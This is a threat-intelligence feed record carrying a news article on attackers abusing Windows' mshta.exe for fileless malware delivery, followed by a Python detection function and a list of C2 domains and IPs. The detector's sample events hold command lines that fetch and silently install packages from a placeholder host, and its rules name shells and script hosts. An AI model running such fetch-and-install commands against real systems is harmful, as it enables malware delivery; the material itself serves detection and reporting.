[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRwznJmDcSGHelTIJIOUbQ7_l41Yoj_1XK66KBHSI8jk":3},{"article":4,"iocs":43},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":30,"category":31,"article_tags":35},"35049e94-947e-4d68-a36e-342cb9026f0d","Microsoft’s Retired IE Tool MSHTA Now Being Used in Fileless Malware Attacks","microsoft-s-retired-ie-tool-mshta-now-being-used-in-fileless-malware-attacks-de5713","Despite Internet Explorer’s retirement, hackers are abusing the legacy MSHTA utility in stealthy fileless malware attacks targeting Windows users.","Threat actors are exploiting the legacy MSHTA utility in Windows to conduct fileless malware attacks, even after Internet Explorer's retirement. Attackers use social engineering to deliver various malware types, including LummaStealer and ClipBanker, by abusing MSHTA to execute malicious code directly in memory.","Hackers abuse retired Internet Explorer tool MSHTA in fileless malware attacks targeting Windows users.","Microsoft’s Retired IE Tool MSHTA Now Being Used in Fileless Malware Attacks
Despite Internet Explorer’s retirement, attackers are abusing the legacy MSHTA utility in stealthy fileless malware attacks targeting Windows users.
By Deeba Ahmed, May 21, 2026
An old Windows tool called MSHTA (the Microsoft HTML Application host, mshta.exe) is being abused by attackers to infect systems with malware, according to new research from Bitdefender. The tool was built to work with Internet Explorer (IE) and still ships enabled by default on Windows despite IE’s retirement in 2022, largely so that older software keeps working.
Attack Patterns
Bitdefender’s research, shared with Hackread.com, shows that threat actors are actively abusing it as a Living-off-the-Land binary (LOLBIN) to carry out fileless attacks. 
Through MSHTA they can execute VBScript and JScript (JavaScript) directly in memory, and because the code runs under a trusted, Microsoft-signed system binary, the activity blends in with legitimate administrative tasks. These fileless chains rely on common social engineering lures such as ClickFix scams and fake software downloads. In one campaign, fake Google ads for Claude Code drew victims in; in another, attackers bundled malware into pirated downloads of the film One Battle After Another. Typically, the attackers have MSHTA launch a hidden command shell that contacts specific attacker-controlled IP addresses and installs a malicious package through Windows Installer (msiexec).
The Types of Threats Discovered
Further investigation showed that MSHTA is used to deliver several kinds of malware: some steal passwords, browser data and cryptocurrency wallet information, while others are more advanced threats that can stay hidden on a machine for a long time to spy on its user. For example, a loader called CountLoader was seen using this method to drop information stealers such as LummaStealer and Amatera. That chain used a zip archive containing a legitimate Python interpreter renamed Setup.exe, which loaded a malicious script (.\\Lib\\encodings\\aliases.py) that in turn launched a renamed copy of mshta.exe (iso2022.exe) to contact C2 domains including google-services.cc, explorer.vg and ccleaner.gl. Similarly, Emmenhtal Loader uses phishing links posted on Discord to send victims to fake reCAPTCHA verification sites such as humancheck.shop, eventually running the LummaStealer payload. Another threat, PurpleFox, uses the utility to quietly download a malicious MSI package disguised as a .png file (3EBCE3A4.png) for data theft. 
MSHTA is also abused by ClipBanker to hijack cryptocurrency wallet addresses: a remote file (checking.hta) downloads persistence scripts named checking.ps1 and ichigo-lite.ps1. These scripts are fetched from the IP addresses 185.208.159.199 and 87.96.21.84 and establish persistence through scheduled tasks disguised as legitimate services. However, the researchers cautioned that not every instance of this activity is malicious: a significant share of the detections came from legitimate software updating itself.
[Figure: CountLoader kill chain (Source: Bitdefender)]
“Not every MSHTA execution we observed was clearly malicious. A significant portion of detections came from DriverPack’s update mechanism… that downloads driver files from third-party sources rather than through official Microsoft update channels. This is an important reminder that MSHTA usage is not automatically malicious,” the blog post reads. Microsoft plans to have VBScript disabled by default by 2027 but has given no public timeline for removing it from Windows entirely; note that retiring VBScript does not remove mshta.exe itself, which also executes JScript. Until that happens, Bitdefender recommends that organisations restrict or block mshta.exe and wscript.exe in environments where they are not operationally required. 
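As an added illustration (not code from Bitdefender or the Hackread article), the following Python triage function applies the abuse patterns described above to process-creation telemetry: a renamed mshta binary identified through its PE OriginalFileName, mshta spawning a command shell or script host, mshta or msiexec handed a remote URL, and a narrow allowlist for a known updater so that benign launches like the DriverPack case go to review rather than alert. The event records are constructed samples shaped like Sysmon Event ID 1 fields; the hosts (RFC 5737 addresses), paths and the ExampleUpdater allowlist entry are placeholders, not indicators from the report. Sample paths use forward slashes so the block stays portable; ntpath.basename accepts either separator, so real backslash paths work unchanged.

```python
import ntpath
import re

# Constructed sample events shaped like Sysmon Event ID 1 fields. Hosts (RFC 5737),
# paths and the updater name are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    # renamed copy of mshta.exe: the image name is a decoy, but the PE header's
    # OriginalFileName still reads MSHTA.EXE
    {'Image': 'C:/Users/victim/AppData/Local/Temp/Setup/iso2022.exe',
     'OriginalFileName': 'MSHTA.EXE',
     'CommandLine': 'iso2022.exe http://203.0.113.7/checking.hta',
     'ParentImage': 'C:/Users/victim/AppData/Local/Temp/Setup/Setup.exe'},
    # mshta launching a hidden command shell
    {'Image': 'C:/Windows/System32/cmd.exe',
     'OriginalFileName': 'Cmd.Exe',
     'CommandLine': 'cmd.exe /c start /min msiexec /i http://203.0.113.7/pkg.msi /qn',
     'ParentImage': 'C:/Windows/System32/mshta.exe'},
    # Windows Installer pulling a package straight from a URL
    {'Image': 'C:/Windows/System32/msiexec.exe',
     'OriginalFileName': 'msiexec.exe',
     'CommandLine': 'msiexec /i http://203.0.113.7/pkg.msi /qn',
     'ParentImage': 'C:/Windows/System32/cmd.exe'},
    # a hypothetical updater running a local .hta, the DriverPack-style benign case
    {'Image': 'C:/Windows/System32/mshta.exe',
     'OriginalFileName': 'MSHTA.EXE',
     'CommandLine': 'mshta.exe C:/Program Files/ExampleUpdater/update.hta',
     'ParentImage': 'C:/Program Files/ExampleUpdater/updater.exe'},
    # unrelated benign process
    {'Image': 'C:/Windows/System32/notepad.exe',
     'OriginalFileName': 'NOTEPAD.EXE',
     'CommandLine': 'notepad.exe notes.txt',
     'ParentImage': 'C:/Windows/explorer.exe'},
]

URL_RE = re.compile('(?i)(https?|ftp)://')
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe'}
# Hypothetical allowlist: full parent paths known to drive mshta legitimately.
# Keep it narrow (exact path, ideally plus signer) so it cannot be satisfied by
# dropping a same-named binary somewhere else.
ALLOWLISTED_PARENTS = {'c:/program files/exampleupdater/updater.exe'}


def basename(path):
    # ntpath.basename splits on both / and the Windows backslash
    return ntpath.basename(path).lower()


def is_mshta(ev):
    # also match on the PE OriginalFileName, so renaming the binary does not evade the check
    return (basename(ev['Image']) == 'mshta.exe'
            or ev.get('OriginalFileName', '').upper() == 'MSHTA.EXE')


def triage(ev):
    # returns (verdict, reason); verdict is 'alert', 'review' or 'ok'
    image = basename(ev['Image'])
    parent = basename(ev['ParentImage'])
    cmd = ev['CommandLine']
    if is_mshta(ev):
        if image != 'mshta.exe':
            return ('alert', 'renamed mshta binary: ' + image)
        if URL_RE.search(cmd):
            return ('alert', 'mshta fetching remote content')
        if ev['ParentImage'].lower() in ALLOWLISTED_PARENTS:
            return ('review', 'mshta launched by allowlisted updater')
        return ('review', 'mshta execution outside the allowlist')
    if parent == 'mshta.exe' and image in SHELLS:
        return ('alert', 'mshta spawned ' + image)
    if image == 'msiexec.exe' and URL_RE.search(cmd):
        return ('alert', 'msiexec installing from a URL')
    return ('ok', '')


def run(events):
    # triage every event and return the verdicts in input order
    return [triage(ev) for ev in events]


if __name__ == '__main__':
    for ev, (verdict, reason) in zip(SAMPLE_EVENTS, run(SAMPLE_EVENTS)):
        print(verdict.upper().ljust(6), reason.ljust(40), ev['CommandLine'])
```

The allowlist is deliberately keyed on the full parent path rather than the file name; in production it should be paired with a signature check on that parent, since an attacker who can write a binary named updater.exe into a user-writable directory would otherwise inherit the exemption.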
","https:\u002F\u002Fhackread.com\u002Fmicrosoft-retired-ie-tool-mshta-fileless-malware-attack\u002F","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Fmicrosoft-retired-ie-tool-mshta-fileless-malware-attack.jpg","2026-05-21T10:18:11+00:00","2026-05-21T12:00:21.326216+00:00",9,[18,21,23,25,28],{"name":19,"type":20},"Internet Explorer","product",{"name":22,"type":20},"MSHTA",{"name":24,"type":20},"Windows",{"name":26,"type":27},"Microsoft","vendor",{"name":29,"type":27},"Bitdefender","89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5",{"id":30,"icon":32,"name":33,"slug":34},null,"Malware","malware",[36,41],{"category":37},{"id":38,"icon":32,"name":39,"slug":40},"80544778-fabb-4dcd-aa35-17492e5dcf4f","Vulnerabilities","vulnerabilities",{"category":42},{"id":30,"icon":32,"name":33,"slug":34},[44,48,50,52,55,59],{"type":45,"value":46,"context":47},"domain","google-services.cc","C2 domain used by CountLoader",{"type":45,"value":49,"context":47},"explorer.vg",{"type":45,"value":51,"context":47},"ccleaner.gl",{"type":45,"value":53,"context":54},"humancheck.shop","Fake reCAPTCHA verification site used by Emmenhtal Loader",{"type":56,"value":57,"context":58},"ip","185.208.159.199","IP address hosting persistence scripts for ClipBanker",{"type":56,"value":60,"context":58},"87.96.21.84"]